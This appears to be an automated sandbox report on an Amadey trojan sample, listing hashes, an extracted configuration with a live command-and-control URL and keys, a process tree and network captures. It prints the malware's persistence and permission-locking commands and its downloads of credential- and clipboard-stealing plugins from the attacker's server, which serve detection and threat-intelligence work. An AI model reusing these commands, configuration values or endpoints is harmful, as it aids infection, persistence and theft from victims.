Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    133s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 09:53 UTC

General

  • Target

    15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe

  • Size

    240KB

  • MD5

    409c5cbf20f61015a81e831f58e487a4

  • SHA1

    12487a47f634366cc6208837dbd67473878f544e

  • SHA256

    15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

  • SHA512

    4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

  • SSDEEP

    6144:V7Vj3uVUn27+6qQx41QPF2nnugMeS2SpY:xwYfQx9FOnugMeS2

Score
10/10

Malware Config

Extracted

Family

amadey

Version

3.89

C2

http://77.91.68.52/mac/index.php

Attributes
  • install_dir

    fefffe8cea

  • install_file

    explonde.exe

  • strings_key

    916aae73606d7a9e02a1d3b47c199688

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe
    "C:\Users\Admin\AppData\Local\Temp\15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
      "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explonde.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe" /F
        3⤵
        • Creates scheduled task(s)
        PID:2664
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explonde.exe" /P "Admin:N"&&CACLS "explonde.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          4⤵
            PID:2832
          • C:\Windows\SysWOW64\cacls.exe
            CACLS "explonde.exe" /P "Admin:N"
            4⤵
              PID:2528
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "explonde.exe" /P "Admin:R" /E
              4⤵
                PID:2996
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                4⤵
                  PID:2784
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "..\fefffe8cea" /P "Admin:N"
                  4⤵
                    PID:2680
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\fefffe8cea" /P "Admin:R" /E
                    4⤵
                      PID:2688
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                    3⤵
                    • Loads dropped DLL
                    PID:2508
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {26CD5782-EEB0-420A-A9D0-65D9FA9B28AD} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:2592
                • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
                  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2920
                • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
                  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2712
                • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
                  C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe
                  2⤵
                  • Executes dropped EXE
                  PID:620

              Network

              • flag-fi
                POST
                http://77.91.68.52/mac/index.php
                explonde.exe
                Remote address:
                77.91.68.52:80
                Request
                POST /mac/index.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: 77.91.68.52
                Content-Length: 88
                Cache-Control: no-cache
                Response
                HTTP/1.1 200 OK
                Date: Wed, 11 Oct 2023 15:33:04 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 6
                Content-Type: text/html; charset=UTF-8
              • flag-fi
                GET
                http://77.91.68.52/mac/Plugins/cred64.dll
                explonde.exe
                Remote address:
                77.91.68.52:80
                Request
                GET /mac/Plugins/cred64.dll HTTP/1.1
                Host: 77.91.68.52
                Response
                HTTP/1.1 404 Not Found
                Date: Wed, 11 Oct 2023 15:33:47 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 273
                Content-Type: text/html; charset=iso-8859-1
              • flag-fi
                GET
                http://77.91.68.52/mac/Plugins/clip64.dll
                explonde.exe
                Remote address:
                77.91.68.52:80
                Request
                GET /mac/Plugins/clip64.dll HTTP/1.1
                Host: 77.91.68.52
                Response
                HTTP/1.1 200 OK
                Date: Wed, 11 Oct 2023 15:33:47 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Last-Modified: Sat, 30 Sep 2023 10:47:01 GMT
                ETag: "16400-6069142dbc6a0"
                Accept-Ranges: bytes
                Content-Length: 91136
                Content-Type: application/x-msdos-program
              • 77.91.68.52:80
                http://77.91.68.52/mac/index.php
                http
                explonde.exe
                509 B
                365 B
                6
                5

                HTTP Request

                POST http://77.91.68.52/mac/index.php

                HTTP Response

                200
              • 77.91.68.52:80
                http://77.91.68.52/mac/Plugins/clip64.dll
                http
                explonde.exe
                3.6kB
                94.8kB
                69
                75

                HTTP Request

                GET http://77.91.68.52/mac/Plugins/cred64.dll

                HTTP Response

                404

                HTTP Request

                GET http://77.91.68.52/mac/Plugins/clip64.dll

                HTTP Response

                200
              No results found

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

                Filesize

                240KB

                MD5

                409c5cbf20f61015a81e831f58e487a4

                SHA1

                12487a47f634366cc6208837dbd67473878f544e

                SHA256

                15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

                SHA512

                4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

              • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

                Filesize

                240KB

                MD5

                409c5cbf20f61015a81e831f58e487a4

                SHA1

                12487a47f634366cc6208837dbd67473878f544e

                SHA256

                15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

                SHA512

                4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

              • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

                Filesize

                240KB

                MD5

                409c5cbf20f61015a81e831f58e487a4

                SHA1

                12487a47f634366cc6208837dbd67473878f544e

                SHA256

                15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

                SHA512

                4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

              • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

                Filesize

                240KB

                MD5

                409c5cbf20f61015a81e831f58e487a4

                SHA1

                12487a47f634366cc6208837dbd67473878f544e

                SHA256

                15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

                SHA512

                4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

              • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

                Filesize

                240KB

                MD5

                409c5cbf20f61015a81e831f58e487a4

                SHA1

                12487a47f634366cc6208837dbd67473878f544e

                SHA256

                15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

                SHA512

                4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

              • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

                Filesize

                240KB

                MD5

                409c5cbf20f61015a81e831f58e487a4

                SHA1

                12487a47f634366cc6208837dbd67473878f544e

                SHA256

                15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

                SHA512

                4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                2ac6d3fcf6913b1a1ac100407e97fccb

                SHA1

                809f7d4ed348951b79745074487956255d1d0a9a

                SHA256

                30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe

                SHA512

                79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                2ac6d3fcf6913b1a1ac100407e97fccb

                SHA1

                809f7d4ed348951b79745074487956255d1d0a9a

                SHA256

                30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe

                SHA512

                79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

                Filesize

                273B

                MD5

                0c459e65bcc6d38574f0c0d63a87088a

                SHA1

                41e53d5f2b3e7ca859b842a1c7b677e0847e6d65

                SHA256

                871c61d5f7051d6ddcf787e92e92d9c7e36747e64ea17b8cffccac549196abc4

                SHA512

                be1ca1fa525dfea57bc14ba41d25fb904c8e4c1d5cb4a5981d3173143620fb8e08277c0dfc2287b792e365871cc6805034377060a84cfef81969cd3d3ba8f90d

              • \Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe

                Filesize

                240KB

                MD5

                409c5cbf20f61015a81e831f58e487a4

                SHA1

                12487a47f634366cc6208837dbd67473878f544e

                SHA256

                15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e

                SHA512

                4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90

              • \Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                2ac6d3fcf6913b1a1ac100407e97fccb

                SHA1

                809f7d4ed348951b79745074487956255d1d0a9a

                SHA256

                30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe

                SHA512

                79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6

              • \Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                2ac6d3fcf6913b1a1ac100407e97fccb

                SHA1

                809f7d4ed348951b79745074487956255d1d0a9a

                SHA256

                30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe

                SHA512

                79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6

              • \Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                2ac6d3fcf6913b1a1ac100407e97fccb

                SHA1

                809f7d4ed348951b79745074487956255d1d0a9a

                SHA256

                30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe

                SHA512

                79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6

              • \Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                2ac6d3fcf6913b1a1ac100407e97fccb

                SHA1

                809f7d4ed348951b79745074487956255d1d0a9a

                SHA256

                30f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe

                SHA512

                79ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.